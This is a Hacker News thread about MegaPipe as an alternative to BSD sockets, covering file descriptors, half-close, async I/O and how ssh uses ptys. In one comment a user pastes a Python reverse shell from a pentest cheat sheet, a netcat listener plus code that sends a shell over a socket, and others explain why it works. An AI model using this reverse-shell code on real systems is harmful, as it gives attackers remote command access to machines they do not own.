Hacker News

This is definitely the correct solution to the problem with BSD sockets - nobody actually treats network connections as files. All of that file overhead and unix integration is entirely wasted. All of the advances that have been made in message passing systems/buses have passed over BSD sockets because everyone is of the opinion that BSD sockets are already perfect. Most of that view comes from the very simple fact that everything uses BSD sockets - even Windows.

Hopefully this research spurs on others to create new implementations, because I bet that there are many improvements possible in the basic socket idea.



With megapipe, would you still be able to write an event loop that operates on their lwsocket and regular file descriptors from pipes? If not that would complicate many applications.

The fact that I/O is unified under file descriptors is a great abstraction and one of the key design points of Unix, although DJB makes a good point that there should have been two file descriptors for sockets: http://cr.yp.to/tcpip/twofd.html
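DJB's point is easiest to see with half-close: because a single fd covers both directions, you can't simply close() the write side while still reading from the same socket; you need the special shutdown() call. A minimal sketch using a socketpair:

```python
import socket

# A connected pair of sockets (like a bidirectional pipe).
a, b = socket.socketpair()

# With one fd per socket, close() would tear down both directions.
# shutdown(SHUT_WR) half-closes: a is done writing but can still read.
a.sendall(b"hello")
a.shutdown(socket.SHUT_WR)

data = b.recv(16)    # b"hello"
eof = b.recv(16)     # b"" -- b sees EOF on its read side
b.sendall(b"world")  # but b can still write back to a
reply = a.recv(16)   # b"world"
print(data, eof, reply)
```

With two fds per socket, as DJB proposes, closing the write fd would signal EOF to the peer with no special API, exactly as it does for pipes.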

I ran into a pretty neat usage of sockets as files the other day (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-ch...)

I'm not exactly sure how this code works, but try it:

    $ nc -l 127.0.0.1 1234

then:

    #!/usr/bin/python
    import socket, subprocess, os
    # Connect back to the listening netcat instance.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 1234))
    # Duplicate the socket's fd onto stdin (0), stdout (1), and stderr (2).
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    # The shell inherits those descriptors, so all its I/O goes over the socket.
    subprocess.call(["/bin/sh", "-i"])
If someone can explain exactly why this works, I'm interested. I sort of get it, but I'm not sure how the socket descriptor can get mapped to stdin, stdout, and stderr with everything still working.


netcat is listening on your machine. the python script is connecting to your machine and giving you a shell.

dup2(oldfd, newfd) closes newfd and makes it a duplicate of oldfd, so both descriptors refer to the same underlying open file.

0 is STDIN's file descriptor by default in *nix (I believe this is standard POSIX, but I could be wrong). 1 is STDOUT, 2 is STDERR.

os.dup2 in this case is taking the file descriptor for the socket and placing it into STDIN, STDOUT, and STDERR.

At this point, any code that reads or writes those descriptors ends up talking to the TCP socket instead.

When subprocess.call is used, it will inherit the parent's STDIN, STDOUT, and STDERR handles, in this case the TCP socket.

So when the shell outputs anything it goes to the TCP socket, and when it reads input, that comes from the TCP socket too.
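The inheritance mechanism described above is easy to demonstrate without a network. This sketch (assuming a POSIX system with an `echo` binary on the PATH) dup2's a temporary file onto fd 1 and lets a child process inherit it:

```python
import os, subprocess, tempfile

with tempfile.TemporaryFile() as f:
    saved = os.dup(1)                   # keep a copy of the real stdout
    os.dup2(f.fileno(), 1)              # fd 1 now refers to the temp file
    subprocess.call(["echo", "hello"])  # the child inherits fd 1
    os.dup2(saved, 1)                   # restore the original stdout
    os.close(saved)
    f.seek(0)
    print(f.read())                     # b'hello\n'
```

Swap the temporary file for a connected socket's fileno() and you have the reverse-shell trick: the child never knows it's talking to the network.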

This is similar in spirit to how nohup works: by redirecting stdout and stderr to a file, the process no longer depends on the terminal, so it survives when the tty goes away. nohup also makes the process ignore SIGHUP, so the departing shell doesn't kill it directly.


Actually, that overhead is not entirely wasted. For example, on Solaris (unlike Linux), Asynchronous I/O is supported for network sockets. (In fairness, Windows also supports it.)

As another example, Solaris has the event completion framework which is also available when using sockets:

https://blogs.oracle.com/barts/entry/entry_2_event_ports

So I wonder how much of this is down to the platform implementation they were testing, rather than their new API? It's unclear from their presentation materials whether this is really just papering over problems in one implementation.

I would have liked to have seen more test data comparing this work on multiple platforms.


Linux is popular, but not exactly the gold standard of async I/O APIs. Comparisons across more platforms would better support the claim that this is a cross-platform improvement over Berkeley sockets.


Don't all programs you use over SSH take advantage of the fact that you can pretend that STDIN is a file even when it's a socket?


I don't think so. ssh allocates a pty and programs write to that, which ssh then proxies back to you. There's a middle-man.

These programs couldn't write directly to the port 22 TCP socket you use to connect, or their output wouldn't be encrypted or get the other benefits SSH provides.
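Python's pty module can illustrate the middle-man arrangement: the child's stdio is a pseudo-terminal whose other end the parent reads, just as sshd reads from the pty and forwards the bytes over the encrypted connection. A sketch, assuming a POSIX system:

```python
import os, pty, subprocess

# The child sees a real tty on its stdio, but the other end is just a
# file descriptor (the pty master) held by the parent -- the parent
# plays the same proxy role that sshd does.
master, slave = pty.openpty()
subprocess.call(["sh", "-c", "test -t 0 && echo is-a-tty"],
                stdin=slave, stdout=slave, stderr=slave)
os.close(slave)
print(os.read(master, 1024))  # the child's output, read via the master
os.close(master)
```

Note the child's `test -t 0` succeeds: as far as it can tell, it's attached to a terminal, even though nothing here is one.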


The real problem is the entrenched legacy software that uses BSD sockets. I don't want to even imagine the cost of rewriting all of that to use a different networking paradigm. POSIX certainly isn't the best way to do things, especially with the move to the cloud, but much of today's high-performance software does fine with sockets. There are absolutely some hacks that are used to get around some inadequacies, but BSD sockets work, by and large.


Agreed there - maybe a possible option would be to flag a specific port as non-BSD? When the kernel sees traffic for that port, some short-circuit logic could hand it off to a different socket implementation. That would let legacy code run fine, while apps set a special flag when binding a socket to get direct access. The routing part of TCP/IP happens before BSD sockets are involved, so this should do an end-run around the BSD socket overhead.

Then you could have your system running as normal, but allowing your http server special access to network i/o. Any kernel hackers around who can comment?


I'm not certain, but it seems from the article that they implemented MegaPipe to run alongside the BSD API. You do have to keep the BSD sockets API alongside the new implementation. Not only because there is a lot of existing code that depends on it, but also because abstracting a socket as a file is actually useful in many cases.


As far as I can tell from their ping-pong server example, it would be possible to implement some kind of virtual BSD sockets API on top of MegaPipe and make the transition relatively easy for everyone.



